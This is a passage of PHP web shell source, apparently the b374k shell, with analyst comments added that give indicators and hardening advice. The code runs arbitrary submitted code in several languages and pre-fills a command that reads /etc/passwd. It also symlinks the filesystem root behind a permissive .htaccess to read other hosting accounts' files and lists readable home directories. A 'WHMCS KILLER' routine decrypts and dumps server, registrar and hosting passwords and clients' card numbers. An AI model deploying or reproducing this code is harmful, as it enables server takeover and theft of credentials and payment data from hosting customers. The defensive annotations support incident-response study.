  1368. $s_gccoption = (isset($_REQUEST['gccoption']))? ssc($_REQUEST['gccoption']):"";
  1369. $s_tmpdir = get_writabledir();
  1370.  
  1371. if(isset($_REQUEST['lang'])){$s_lang = $_REQUEST['lang'];}
  1372.  
        // php: evaluated in-process; this path writes nothing to disk
  1373. if(strtolower($s_lang)=='php'){
  1374. ob_start();
  1375. eval($s_code);
  1376. $s_res = ob_get_contents();
  1377. ob_end_clean();
  1378. }
        // script interpreters: the lang value itself is used as the command name
  1379. elseif(strtolower($s_lang)=='python'||strtolower($s_lang)=='perl'||strtolower($s_lang)=='ruby'||strtolower($s_lang)=='node'){
  1380. $s_rand = md5(time().rand(0,100));
  1381. $s_script = $s_tmpdir.$s_rand;
  1382. file_put_contents($s_script, $s_code);
  1383. if(is_file($s_script)){
  1384. $s_res = exe($s_lang." ".$s_gccoption." ".$s_script);
  1385. unlink($s_script);
  1386. }
  1387. }
        // C: compile in the writable directory, run the result, then remove binary and source
  1388. elseif(strtolower($s_lang)=='gcc'){
  1389. $s_script = md5(time().rand(0,100));
  1390. chdir($s_tmpdir);
  1391. file_put_contents($s_script.".c", $s_code);
  1392. if(is_file($s_script.".c")){
  1393. $s_scriptout = $s_win ? $s_script.".exe" : $s_script;
  1394. $s_res = exe("gcc ".$s_script.".c -o ".$s_scriptout.$s_gccoption);
  1395. if(is_file($s_scriptout)){
  1396. $s_res = $s_win ? exe($s_scriptout) : exe("chmod +x ".$s_scriptout." ; ./".$s_scriptout);
  1397. rename($s_scriptout, $s_scriptout."del");
  1398. unlink($s_scriptout."del");
  1399. }
  1400. unlink($s_script.".c");
  1401. }
  1402. chdir($s_cwd);
  1403. }
        // Java: class name taken from the submitted source, else a generated b374k_<8 hex> wrapper class
  1404. elseif(strtolower($s_lang)=='java'){
  1405. if(preg_match("/class\ ([^{]+){/i",$s_code, $s_r)){
  1406. $s_classname = trim($s_r[1]);
  1407. $s_script = $s_classname;
  1408. }
  1409. else{
  1410. $s_rand = "b374k_".substr(md5(time().rand(0,100)),0,8);
  1411. $s_script = $s_rand;
  1412. $s_code = "class ".$s_rand." { ".$s_code . " } ";
  1413. }
  1414. chdir($s_tmpdir);
  1415. file_put_contents($s_script.".java", $s_code);
  1416. if(is_file($s_script.".java")){
  1417. $s_res = exe("javac ".$s_script.".java");
  1418. if(is_file($s_script.".class")){
  1419. $s_res .= exe("java ".$s_gccoption." ".$s_script);
  1420. unlink($s_script.".class");
  1421. }
  1422. unlink($s_script.".java");
  1423. }
  1424. chdir($s_pwd);
  1425. }
  1426. }
  1427.  
        // Build the language <select>. $s_python, $s_perl, $s_ruby, $s_node, $s_gcc and $s_java
        // are set outside this excerpt (presumably interpreter-availability flags; confirm).
  1428. $s_lang_available = "<option value='php'>php</option>";
  1429. $s_selected = "";
  1430. if($s_python){
  1431. $s_checked = ($s_lang == "python") ? "selected" : "";
  1432. $s_lang_available .= "<option value='python' ".$s_checked.">python</option>";
  1433. }
  1434. if($s_perl){
  1435. $s_checked = ($s_lang == "perl") ? "selected" : "";
  1436. $s_lang_available .= "<option value='perl' ".$s_checked.">perl</option>";
  1437. }
  1438. if($s_ruby){
  1439. $s_checked = ($s_lang == "ruby") ? "selected" : "";
  1440. $s_lang_available .= "<option value='ruby' ".$s_checked.">ruby</option>";
  1441. }
  1442. if($s_node){
  1443. $s_checked = ($s_lang == "node") ? "selected" : "";
  1444. $s_lang_available .= "<option value='node' ".$s_checked.">node</option>";
  1445. }
  1446. if($s_gcc){
  1447. $s_checked = ($s_lang == "gcc") ? "selected" : "";
  1448. $s_lang_available .= "<option value='gcc' ".$s_checked.">c</option>";
  1449. }
  1450. if($s_java){
  1451. $s_checked = ($s_lang == "java") ? "selected" : "";
  1452. $s_lang_available .= "<option value='java' ".$s_checked.">java</option>";
  1453. }
  1454. $s_gccoptionclass = ($s_lang=="php")? "sembunyi":"";
  1455. $s_e_result = (!empty($s_res)) ? "<pre id='evalres' class='border-top' style='margin:4px 0 0 0;padding:6px 0;' >".hss($s_res)."</pre>":"";
        // The form is appended to $s_result. The textarea is pre-filled with the escaped
        // submitted code followed by a fixed sample statement that reads /etc/passwd.
  1456. $s_result .= "<form action='".$s_self."' method='post'>
  1457. <textarea id='evalcode' name='evalcode' style='height:150px;' class='txtarea'>".hss($s_code)." echo file_get_contents('/etc/passwd'); </textarea>
  1458. <table><tr><td style='padding:0;'><p><input type='submit' name='evalcodesubmit' class='inputzbut' value='Go !' style='width:120px;height:30px;' /></p>
  1459. </td><td><select name='lang' onchange='evalselect(this);' class='inputzbut' style='width:120px;height:30px;padding:4px;'>
  1460. ".$s_lang_available."</select>
  1461. </td>
  1462. <td><div title='If you want to give additional option to interpreter or compiler, give it here' id='additionaloption' class='".$s_gccoptionclass."'>Additional option&nbsp;&nbsp;<input class='inputz' style='width:400px;' type='text' name='gccoption' value='".hss($s_gccoption)."' id='gccoption' /></div></td>
  1463. </tr>
  1464. </table>
  1465. ".$s_e_result."
  1466. <input type='hidden' name='x' value='eval' />
  1467. </form>
  1468. ";
  1469. }
  1470. // find
        // Analyst notes: file/directory search panel, reached when the find request key is set.
        // Starting at the path in find, getallfiles() (defined outside this excerpt; presumably
        // a recursive listing) collects candidates, which are narrowed by type (sfile/sdir),
        // by name (sfname/sdname), by file content (sfcontain) and, while rendering, by
        // is_writable() / is_readable() / is_executable().
        // With a content filter set, every candidate file is read in full with
        // file_get_contents(), so one search appears as a burst of reads across the tree from
        // the web server account; file-access auditing on sensitive paths would record it.
        // Hardening: open_basedir and per-site system users bound what the walk can reach.
  1471. elseif(isset($_REQUEST['find'])){
  1472. $s_p = ss($_REQUEST['find']);
  1473.  
  1474. $s_type = isset($_REQUEST['type']) ? $_REQUEST['type'] : "sfile";
  1475. $s_sfname = (!empty($_REQUEST['sfname']))?ssc($_REQUEST['sfname']):'';
  1476. $s_sdname = (!empty($_REQUEST['sdname']))?ssc($_REQUEST['sdname']):'';
  1477. $s_sfcontain = (!empty($_REQUEST['sfcontain']))?ssc($_REQUEST['sfcontain']):'';
  1478.  
  1479. $s_sfnameregexchecked=$s_sfnameicasechecked=$s_sdnameregexchecked=$s_sdnameicasechecked=$s_sfcontainregexchecked=$s_sfcontainicasechecked=$s_swritablechecked=$s_sreadablechecked=$s_sexecutablechecked="";
  1480. $s_sfnameregex=$s_sfnameicase=$s_sdnameregex=$s_sdnameicase=$s_sfcontainregex=$s_sfcontainicase=$s_swritable=$s_sreadable=$s_sexecutable=false;
  1481.  
        // Each checkbox sets a boolean plus the "checked" attribute used to redraw the form
  1482. if(isset($_REQUEST['sfnameregex'])){$s_sfnameregex=true;$s_sfnameregexchecked="checked";}
  1483. if(isset($_REQUEST['sfnameicase'])){$s_sfnameicase=true;$s_sfnameicasechecked="checked";}
  1484. if(isset($_REQUEST['sdnameregex'])){$s_sdnameregex=true;$s_sdnameregexchecked="checked";}
  1485. if(isset($_REQUEST['sdnameicase'])){$s_sdnameicase=true;$s_sdnameicasechecked="checked";}
  1486. if(isset($_REQUEST['sfcontainregex'])){$s_sfcontainregex=true;$s_sfcontainregexchecked="checked";}
  1487. if(isset($_REQUEST['sfcontainicase'])){$s_sfcontainicase=true;$s_sfcontainicasechecked="checked";}
  1488. if(isset($_REQUEST['swritable'])){$s_swritable=true;$s_swritablechecked="checked";}
  1489. if(isset($_REQUEST['sreadable'])){$s_sreadable=true;$s_sreadablechecked="checked";}
  1490. if(isset($_REQUEST['sexecutable'])){$s_sexecutable=true;$s_sexecutablechecked="checked";}
  1491.  
  1492. $s_sexecb = (function_exists("is_executable")) ? "<input class='css-checkbox' type='checkbox' name='sexecutable' value='sexecutable' id='se' ".$s_sexecutablechecked." /><label class='css-label' for='se'>Executable</span>":"";
  1493.  
        // Filtering runs only when the form was submitted (sgo); otherwise only the form is drawn.
        // Non-matching entries are removed from $s_candidate with array_diff() as the loop goes.
        // In regex mode the request value is placed between "/" delimiters as given.
  1494. $s_candidate = array();
  1495. if(isset($_REQUEST['sgo'])){
  1496. $s_af = "";
  1497.  
  1498. $s_candidate = getallfiles($s_p);
  1499. if($s_type=='sfile') $s_candidate = array_filter($s_candidate, "is_file");
  1500. elseif($s_type=='sdir') $s_candidate = array_filter($s_candidate, "is_dir");
  1501.  
  1502. foreach($s_candidate as $s_a){
  1503. if($s_type=='sdir'){
  1504. if(!empty($s_sdname)){
  1505. if($s_sdnameregex){
  1506. if($s_sdnameicase){if(!preg_match("/".$s_sdname."/i", basename($s_a))) $s_candidate = array_diff($s_candidate,array($s_a));}
  1507. else{if(!preg_match("/".$s_sdname."/", basename($s_a))) $s_candidate = array_diff($s_candidate,array($s_a));}
  1508. }
  1509. else{
  1510. if($s_sdnameicase){if(strpos(strtolower(basename($s_a)),strtolower($s_sdname))===false) $s_candidate = array_diff($s_candidate,array($s_a));}
  1511. else{if(strpos(basename($s_a),$s_sdname)===false) $s_candidate = array_diff($s_candidate,array($s_a));}
  1512. }
  1513. }
  1514. }
  1515. elseif($s_type=='sfile'){
  1516. if(!empty($s_sfname)){
  1517. if($s_sfnameregex){
  1518. if($s_sfnameicase){if(!preg_match("/".$s_sfname."/i", basename($s_a))) $s_candidate = array_diff($s_candidate,array($s_a));}
  1519. else{if(!preg_match("/".$s_sfname."/", basename($s_a))) $s_candidate = array_diff($s_candidate,array($s_a));}
  1520. }
  1521. else{
  1522. if($s_sfnameicase){if(strpos(strtolower(basename($s_a)),strtolower($s_sfname))===false) $s_candidate = array_diff($s_candidate,array($s_a));}
  1523. else{if(strpos(basename($s_a),$s_sfname)===false) $s_candidate = array_diff($s_candidate,array($s_a));}
  1524. }
  1525. }
  1526. if(!empty($s_sfcontain)){
  1527. $s_sffcontent = @file_get_contents($s_a);
  1528. if($s_sfcontainregex){
  1529. if($s_sfcontainicase){if(!preg_match("/".$s_sfcontain."/i", $s_sffcontent)) $s_candidate = array_diff($s_candidate,array($s_a));}
  1530. else{if(!preg_match("/".$s_sfcontain."/", $s_sffcontent)) $s_candidate = array_diff($s_candidate,array($s_a));}
  1531. }
  1532. else{
  1533. if($s_sfcontainicase){if(strpos(strtolower($s_sffcontent),strtolower($s_sfcontain))===false) $s_candidate = array_diff($s_candidate,array($s_a));}
  1534. else{if(strpos($s_sffcontent,$s_sfcontain)===false) $s_candidate = array_diff($s_candidate,array($s_a));}
  1535. }
  1536. }
  1537. }
  1538. }
  1539. }
  1540.  
        // Permission filters are applied here, while the result links are rendered
  1541. $s_f_result = "";$s_link="";
  1542. foreach($s_candidate as $s_c){
  1543. $s_c=trim($s_c);
  1544. if($s_swritable && !is_writable($s_c)) continue;
  1545. if($s_sreadable && !is_readable($s_c)) continue;
  1546. if($s_sexecutable && !is_executable($s_c)) continue;
  1547. if($s_type=="sfile") $s_link = $s_self."view=".$s_c;
  1548. elseif($s_type=="sdir") $s_link = $s_self."view=".cp($s_c);
  1549. $s_f_result .= "<p class='notif' ondblclick=\"return go('".addslashes($s_link)."',event);\"><a href='".$s_link."' onclick='return false;'>".$s_c."</a></p>";
  1550. }
  1551.  
  1552. $s_tsdir = ($s_type=="sdir")? "selected":"";
  1553. $s_tsfile = ($s_type=="sfile")? "selected":"";
  1554.  
  1555. if(!is_dir($s_p)) $s_result .= "<p class='notif'>Cannot find the path specified ".$s_p."</p>";
  1556. $s_result .= "<form action='".$s_self."' method='post'>
  1557. <div class='mybox'><h2>Find</h2>
  1558. <table class='myboxtbl'>
  1559. <tr><td style='width:140px;'>Search in</td>
  1560. <td colspan='2'><input style='width:100%;' value='".hss($s_p)."' class='inputz' type='text' name='find' /></td></tr>
  1561. <tr onclick=\"findtype('sdir');\">
  1562. <td>Dirname contains</td>
  1563. <td style='width:400px;'><input class='inputz' style='width:100%;' type='text' name='sdname' value='".hss($s_sdname)."' /></td>
  1564. <td>
  1565. <input type='checkbox' class='css-checkbox' name='sdnameregex' id='sdn' ".$s_sdnameregexchecked." /><label class='css-label' for='sdn'>Regex (pcre)</label>
  1566. <input type='checkbox' class='css-checkbox' name='sdnameicase' id='sdi' ".$s_sdnameicasechecked." /><label class='css-label' for='sdi'>Case Insensitive</label>
  1567. </td>
  1568. </tr>
  1569. <tr onclick=\"findtype('sfile');\">
  1570. <td>Filename contains</td>
  1571. <td style='width:400px;'><input class='inputz' style='width:100%;' type='text' name='sfname' value='".hss($s_sfname)."' /></td>
  1572. <td>
  1573. <input type='checkbox' class='css-checkbox' name='sfnameregex' id='sfn' ".$s_sfnameregexchecked." /><label class='css-label' for='sfn'>Regex (pcre)</label>
  1574. <input type='checkbox' class='css-checkbox' name='sfnameicase' id='sfi' ".$s_sfnameicasechecked." /><label class='css-label' for='sfi'>Case Insensitive</label>
  1575. </td>
  1576. </tr>
  1577. <tr onclick=\"findtype('sfile');\">
  1578. <td>File contains</td>
  1579. <td style='width:400px;'><input class='inputz' style='width:100%;' type='text' name='sfcontain' value='".hss($s_sfcontain)."' /></td>
  1580. <td>
  1581. <input type='checkbox' class='css-checkbox' name='sfcontainregex' id='sff' ".$s_sfcontainregexchecked." /><label class='css-label' for='sff'>Regex (pcre)</label>
  1582. <input type='checkbox' class='css-checkbox' name='sfcontainicase' id='sffi' ".$s_sfcontainicasechecked." /><label class='css-label' for='sffi'>Case Insensitive</label>
  1583. </td>
  1584. </tr>
  1585. <tr>
  1586. <td>Permissions</td>
  1587. <td colspan='2'>
  1588. <input type='checkbox' class='css-checkbox' name='swritable' id='sw' ".$s_swritablechecked." /><label class='css-label' for='sw'>Writable</label>
  1589. <input type='checkbox' class='css-checkbox' name='sreadable' id='sr' ".$s_sreadablechecked." /><label class='css-label' for='sr'>Readable</label>
  1590. ".$s_sexecb."
  1591. </td>
  1592. </tr>
  1593. <tr><td>
  1594. <input type='submit' name='sgo' class='inputzbut' value='Search !' style='width:120px;height:30px;margin:0;' />
  1595. </td>
  1596. <td>
  1597. <select name='type' id='type' class='inputzbut' style='width:120px;height:30px;margin:0;padding:4px;'>
  1598. <option value='sfile' ".$s_tsfile.">Search file</option>
  1599. <option value='sdir' ".$s_tsdir.">Search dir</option>
  1600. </select>
  1601. </td>
  1602. <td></td></tr>
  1603. </table>
  1604. </div>
  1605. </form>
  1606. <div>
  1607. ".$s_f_result."
  1608. </div>
  1609. ";
  1610. }
  1611.  
  1612. //////// SYMLINK //////////
        // Analyst notes: cross-account read technique for shared hosting, reached with x=symlink.
        //   1. creates a directory DM (mode 0777) at the relative path 'DM',
        //   2. writes DM/.htaccess with "Options all", handler/type overrides that serve .php and
        //      .html as text/plain, and "Require None" / "Satisfy Any",
        //   3. creates DM/dm.txt as a symbolic link to "/",
        //   4. reads the zone "..." lines of /etc/named.conf, takes each domain's account from
        //      the owner of /etc/valiases/<domain>, and prints links of the form
        //      DM/dm.txt/home/<user>/public_html.
        // Domains matching the listed TLD patterns are only rendered in red; nothing else
        // depends on that match.
        // Indicators on disk: a DM directory in a web-served path, DM/.htaccess with the
        // directives above, and a symlink DM/dm.txt pointing at the filesystem root.
        // Hardening: Apache SymLinksIfOwnerMatch in place of FollowSymLinks (Apache documents it
        // as not race-free), AllowOverride that does not let .htaccess set Options or handlers,
        // symlink in the disable_functions ini directive, open_basedir, and /etc/named.conf not
        // readable by site accounts.
        // Triage: eregi() was removed in PHP 7.0, so this branch only runs on older PHP.
  1613.  
  1614. elseif(isset($_REQUEST['x']) && ($_REQUEST['x']=='symlink')){
  1615. @set_time_limit(0);
  1616. echo "<center>";
  1617. @mkdir('DM',0777);
  1618. $htaccess = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  1619. $write =@fopen ('DM/.htaccess','w');
  1620. fwrite($write ,$htaccess);
  1621. @symlink('/','DM/dm.txt');
  1622. $filelocation = basename(__FILE__);
  1623. $read_named_conf = @file('/etc/named.conf');
  1624. if(!$read_named_conf) {
  1625. echo "<pre class=ml1 style='margin-top:5px'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
  1626. } else {
  1627. echo "<br><br>
  1628. <div class='tmp'>
  1629. <table border='1' bordercolor='#FF0000' width='500' cellpadding='1' cellspacing='0'>
  1630. <td align='center'><b>_DOMAINS_</b></td>
  1631. <td align='center'><b>_USERS_</b></td>
  1632. <td align='center'><b>_SYMLINK_</b></td>";
  1633. foreach($read_named_conf as $subject){
  1634. if(eregi('zone',$subject)){
  1635. preg_match_all('#zone "(.*)"#',$subject,$string);
  1636. flush();
  1637. if(strlen(trim($string[1][0])) >2){
        // Account name is inferred from the owner uid of the domain's /etc/valiases entry
  1638. $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
  1639. $name = $UID['name'] ;
  1640. @symlink('/','DM/dm.txt');
  1641. $name = $string[1][0];
  1642. $iran = '\.ir';
  1643. $israel = '\.il';
  1644. $indo = '\go.id';
  1645. $sg = '\.sg';
  1646. $edu = '\.edu';
  1647. $gov = '\.gov';
  1648. $gose = '\.go';
  1649. $gober = '\.gob';
  1650. $mil1 = '\.mil';
  1651. $mil2 = '\.mi';
  1652. $mm = '\.mm';
  1653. $my = '\.my';
  1654. if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])
  1655. or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0]))
  1656. {
  1657. $name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>';
  1658. }
  1659. echo "<tr><td>
  1660. <div class='dom'><center><a target='_blank' href=http://".$string[1][0].'/>'.$name.' </a></center></div></td>
  1661. <td><center>'.$UID['name']."</center></td>
  1662. <td><center><a href='DM/dm.txt/home/".$UID['name']."/public_html' target='_blank'>Symlink </a></center>
  1663. </td></tr></div>";
  1664. flush();
  1665. }}}}
  1666. echo "</center></table>";
  1667. }
  1668.  
  1669. ////////// JUMPING READABLE //////////
        // Analyst notes: enumerates other accounts' web roots on a shared host, reached with
        // x=jumping. It reads /etc/passwd, skips the first 11 lines ($i > 10), takes the login
        // name before the first ":" and keeps every /home/<user>/public_html/ for which
        // is_readable() succeeds for the PHP process; each hit is printed as a ?cd=<path> link.
        // A non-empty list therefore means account directories on this host are readable across
        // tenants.
        // Hardening: home and public_html directories not world-readable, PHP running as the
        // site's own user (separate pools per account) and open_basedir, so that is_readable()
        // fails outside the compromised account.
  1670. elseif(isset($_REQUEST['x']) && ($_REQUEST['x']=='jumping')){
  1671. @$passwd = fopen('/etc/passwd','r');
  1672. if (!$passwd) {
  1673. die('<b><center>[+] cant read /etc/passwd [+]</b></center>');
  1674. }
  1675. $pub = array();
  1676. $users = array();
  1677. $conf = array();
  1678. $i = 0;
  1679. while(!feof($passwd)){
  1680. $str = fgets($passwd);
        // Only lines after the 11th are considered
  1681. if ($i > 10){
  1682. $pos = strpos($str,':');
  1683. $username = substr($str,0,$pos);
  1684. $dirz = '/home/'.$username.'/public_html/';
  1685. if (($username != '')){
  1686. if (is_readable($dirz)){
  1687. array_push($users,$username);
  1688. array_push($pub,$dirz);
  1689. }
  1690. }
  1691. }
  1692. $i++;
  1693. }
  1694. echo '<br><br>';
  1695. echo "<center><b>[+] KETEMU ".sizeof($pub)." MAHO"." [+]</b><br/><br/>";
  1696. foreach ($users as $user)
  1697. {
  1698. $path = "/home/$user/public_html/";
  1699. echo "<a href='?cd&#61;$path' target='_blank' style='font-weight:bold; color:#FFFFFF;'>$path</a><br>";
  1700. }
  1701. echo "<br>";
  1702. echo '</center></body></html>';
  1703. }
  1704.  
  1705. ////////// WHMCS KILLER //////////
        // Analyst notes: credential and card-data dump against a WHMCS database, reached with
        // x=whmcs. POST fields anu1..anu5 carry the database host, user, password, database name
        // and the WHMCS cc_encryption_hash; the submit field plapon triggers the dump.
        // Tables read: tblservers, tblregistrars, tblpaymentgateways, tblclients, tblhosting.
        // Stored passwords and registrar values are decoded with dec(); card number, expiry and
        // issue number are decrypted in SQL with AES_DECRYPT keyed by md5(hash . client id).
        // Incident response: where this shell sat on a host from which the WHMCS database
        // credentials and encryption hash were readable, treat every server, registrar, gateway
        // and hosting credential in those tables, and all stored card data, as disclosed.
        // Hardening: keep the WHMCS configuration file unreadable to other accounts, restrict
        // the database user to the application host, and avoid storing card data locally.
        // Triage: the mysql_* functions were removed in PHP 7.0, so this branch only runs on
        // older PHP.
  1706.  
  1707. elseif(isset($_REQUEST['x']) && ($_REQUEST['x']=='whmcs')){
  1708. $s_result = " ";
  1709. $s_msg = "";
  1710. $perawan = $_POST['anu1'];
  1711. $kimcil = $_POST['anu2'];
  1712. $janda = $_POST['anu3'];
  1713. $hotel = $_POST['anu4'];
  1714. $kondom = $_POST['anu5'];
  1715.  
        // Connection errors are suppressed with @; a failed connection is not checked
  1716. @mysql_connect($perawan,$kimcil,$janda);
  1717. @mysql_select_db($hotel);
  1718. $cc_encryption_hash = $kondom;
  1719.  
        // dec(): decodes one stored value. The input is base64; its first block is an IV masked
        // by XOR with the hashed key, the remainder is XORed with a key stream that is re-hashed
        // every $hash_length bytes together with the previous output block.
  1720. function dec($string,$cc_encryption_hash){
  1721. $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
  1722. $hash_key = _hash($key);
  1723.  
  1724. $hash_length = strlen($hash_key);
  1725. $string = base64_decode($string);
  1726. $tmp_iv = substr($string,0,$hash_length);
  1727. $string = substr($string,$hash_length,strlen ($string) - $hash_length);
  1728. $iv = $out = '';
  1729. $c = 0;
  1730. while ($c < $hash_length){
  1731. $iv .= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
  1732. ++$c;
  1733. }
  1734.  
  1735. $key = $iv;
  1736. $c = 0;
  1737. while ($c < strlen($string)){
  1738. if (($c != 0 AND $c % $hash_length == 0)){
  1739.  
  1740. $key = _hash($key . substr($out,$c - $hash_length,$hash_length));
  1741. }
  1742. $out .= chr(ord($key[$c % $hash_length]) ^ ord ($string[$c]));
  1743. ++$c;
  1744. }
  1745. return $out;
  1746. }
        // _hash(): sha1 of the input (md5 when sha1 is unavailable), returned as raw bytes by
        // converting each pair of hex digits to one character.
  1747. function _hash($string)
  1748. {
  1749. $hash = (function_exists('sha1')) ? sha1($string):md5($string);
  1750. $out = '';
  1751. $c = 0;
  1752.  
  1753. while ($c < strlen($hash)){
  1754. $out .= chr(hexdec($hash[$c] .$hash[$c + 1]));
  1755. $c += 2;
  1756. }
  1757. return $out;
  1758. }
  1759.  
  1760.  
        // The dump runs only when the form's submit field is present; rows are echoed directly
  1761. if(isset($_POST['plapon'])) {
  1762. $query = mysql_query("SELECT *FROM tblservers");
  1763. echo "<hr><br/><center>
  1764. <font color='lime' size='7'><b><u>Host Root</b></u></font></center><br/>
  1765. <table border='1' cellpadding='5' align='center'>
  1766. <tr> <td align='center'><b> <font color='lime'> TYPE</font></b></td>
  1767. <td align='center'><b> <font color='lime'> ACTIVE </font></b></td>
  1768. <td align='center'><b> <font color='lime'> IP ADDRESS</font></b></td>
  1769. <td align='center'><b> <font color='lime'> USERNAME</font></b></td>
  1770. <td align='center'><b> <font color='lime'> PASSWORD</font></b></td>
  1771. <td align='center'><b> <font color='lime'>ACCESS HASH</font></b></td>
  1772. <td align='center'><b> <font color='lime'>NAME SERVER</font></b>
  1773. </tr>";
  1774.  
  1775. while($v = mysql_fetch_array($query)) {
  1776. echo "<tr>
  1777. <td align='center'> <font color='white'> {$v['type']}</font></td>
  1778. <td align='center'> <font color='white'> {$v['active']}</font></td>
  1779. <td align='center'> <font color='white'> {$v['ipaddress']}</font></td>
  1780. <td> <font color='white'> {$v['username']}</font></td>
  1781. <td> <font color='white'> ".dec($v['password'],$cc_encryption_hash)."</font></td>
  1782. <td> <font color='white'> {$v['accesshash']}</font></td>
  1783. <td> <font color='white'> {$v['nameserver1']}</font></td>
  1784. </tr>";
  1785. }
  1786. echo "</table>";
  1787.  
  1788. $query = mysql_query("SELECT *FROM tblregistrars");
  1789. echo "<center><font color='lime' size='7'><b><u>Domain Registrars</u></b></font></center><br/>
  1790. <table border='1' align='center' cellpadding='5'>
  1791. <tr> <td align='center'><b> <font color='lime'> REGISTRAR</font></b></td>
  1792. <td align='center'><b> <font color='lime'> SETTING</font></b></td>
  1793. <td align='center'><b> <font color='lime'> VALUE</font> </b></td></tr>";
  1794. while($v = mysql_fetch_array($query)){
  1795. $value = (!dec($v['value'],$cc_encryption_hash)) ? "0":dec($v['value'],$cc_encryption_hash);
  1796. echo "<tr>
  1797. <td align='center'> <font color='white'> {$v['registrar']}</font></td>
  1798. <td align='center'> <font color='white'> {$v['setting']}</font></td>
  1799. <td align='center'> <font color='white'> $value</font></td></tr>" ;
  1800. }
  1801. echo "</table>";
  1802.  
  1803. $query = mysql_query("SELECT *FROM tblpaymentgateways");
  1804. echo "<center><font color='lime' size='7'><b><u>Payment Gateway</u></b></font></center><br/> <table border='1' align='center' cellpadding='5'>
  1805. <tr> <td align='center'><b> <font color='lime'> GATEWAY</font></b></td>
  1806. <td align='center'><b> <font color='lime'> SETTING </font></b></td>
  1807. <td align='center'><b> <font color='lime'> VALUE </font></b></td>
  1808. <td align='center'><b> <font color='lime'> ORDER </font></b></td></tr>";
  1809. while($v = mysql_fetch_array($query)){
  1810. echo "<tr>
  1811. <td align='center'> <font color='white'> {$v['gateway']}</font></td>
  1812. <td align='center'> <font color='white'> {$v['setting']}</font></td>
  1813. <td align='center'> <font color='white'> {$v['value']}</font></td>
  1814. <td align='center'> <font color='white'> {$v['order']}</font></td> </tr>" ;
  1815. }
  1816. echo "</table>";
        // Card data: one follow-up query per client row that has a non-empty issuenumber
  1817. $query = mysql_query("SELECT id FROM tblclients WHERE issuenumber != '' ORDER BY id DESC");
  1818.  
  1819. echo "<hr><br/><center><font color='lime' size='7'><b><u>Cilent CC</b></u></font></center><br/> <table border='1' cellpadding='5' align='center'>
  1820. <tr><td align='center'><b> <font color='lime'>CardType</font></b></td>
  1821. <td align='center'><b><font color='lime'>CardNumb </font></b></td>
  1822. <td align='center'><b> <font color='lime'>Expdate</font></b></td>
  1823. <td align='center'><b> <font color='lime'>IssueNumber</font></b></td>
  1824. <td align='center'><b> <font color='lime'>FirstName</font></b></td>
  1825. <td align='center'><b> <font color='lime'>LastName</font></b></td>
  1826. <td align='center'><b><font color='lime'>Address</font></b></td>
  1827. <td align='center'><b> <font color='lime'>Country</font></b></td>
  1828. <td align='center'><b> <font color='lime'>Phone</font></b></td>
  1829. <td align='center'><b> <font color='lime'>Email</font></b></td>
  1830. </tr>";
  1831.  
  1832. while($v = mysql_fetch_array($query)) {
  1833. $cchash = md5($cc_encryption_hash.$v['0']);
  1834.  
  1835. $s = mysql_query("SELECT firstname,lastname,address1,country,phonenumber,cardtype,email,AES_DECRYPT(cardnum,'" . $cchash . "') as cardnum,AES_DECRYPT(expdate,'" . $cchash . "') as expdate,AES_DECRYPT(issuenumber,'" . $cchash . "') as issuenumber FROM tblclients WHERE id='".$v['0']."'");
  1836.  
  1837. $v2=mysql_fetch_array($s);
  1838.  
  1839. echo "<tr>
  1840. <td align='center'> <font color='white'> ".$v2['cardtype']."</font></td>
  1841. <td align='center'> <font color='white'> ".$v2['cardnum']." </font> </td>
  1842. <td align='center'> <font color='white'> ".$v2['expdate']." </font> </td>
  1843. <td align='center'> <font color='white'> ".$v2['issuenumber']." </font> </td>
  1844. <td align='center'> <font color='white'> ".$v2['firstname']." </font> </td>
  1845. <td align='center'> <font color='white'> ".$v2['lastname']." </font> </td>
  1846. <td align='center'> <font color='white'> ".$v2['address1']." </font> </td>
  1847. <td align='center'> <font color='white'> ".$v2['country']." </font> </td>
  1848. <td align='center'> <font color='white'> ".$v2['phonenumber']." </font> </td>
  1849. <td align='center'> <font color='white'> ".$v2['email']." </font> </td></tr>";
  1850. }
  1851. echo "</table>";
  1852.  
  1853.  
  1854.  
  1855. $query = mysql_query("SELECT *FROM tblhosting");
  1856. echo "<center><font color='lime' size='7'><b><u>Clients Hosting Account</u></b></font></center><br/><table border='1' cellpadding='5' align='center'>
  1857. <tr><td align='center'><b> <font color='lime'> DOMAIN</font></b></td>
  1858. <td align='center'><b> <font color='lime'> USERNAME</font></b></td>
  1859. <td align='center'><b> <font color='lime'> PASSWORD</font></b></td>
  1860. <td align='center'><b> <font color='lime'> IP ADDRESS</font></b></td></tr>";
  1861. while($v = mysql_fetch_array($query)){
  1862. echo "<tr>
  1863. <td align='center'> <font color='white'> {$v['domain']}</font></td>
  1864. <td align='center'> <font color='white'> {$v['username']}</font></td>
  1865. <td align='center'> <font color='white'> ".dec($v['password'],$cc_encryption_hash)."</font></td>
  1866. <td align='center'> <font color='white'> {$v['assignedips']}</font></td></tr>";
  1867. }
  1868. echo "</table>";
  1869. }
  1870.  
        // Input form for the five connection values; it posts back to the shell itself
  1871. if(!empty($s_msg)) $s_result .= $s_msg;
  1872. $s_result .= "<p><br/><body><center>
  1873. <h1>[+] WHMCS KILLER [+] </h1>
  1874. <h1>THANKS TO RAB3OUN</h1>
  1875. <p><form action='".$s_self."' method='post'>
  1876. <table border=1>
  1877. <tr><td>db_host </td>
  1878. <td><input type='text' style='color:#FF0000;background-color:#000000' size='60' name='anu1' value='localhost'></td></tr>
  1879. <tr><td>db_username </td>
  1880. <td><input type='text' style='color:#FF0000;background-color:#000000' size='60' name='anu2'></td></tr>
  1881. <tr><td>db_password</td>
  1882. <td><input type='text' style='color:#FF0000;background-color:#000000' size='60' name='anu3'></td></tr>
  1883. <tr><td>db_name</td>
  1884. <td><input type='text' style='color:#FF0000;background-color:#000000' size='60' name='anu4'></td></tr>
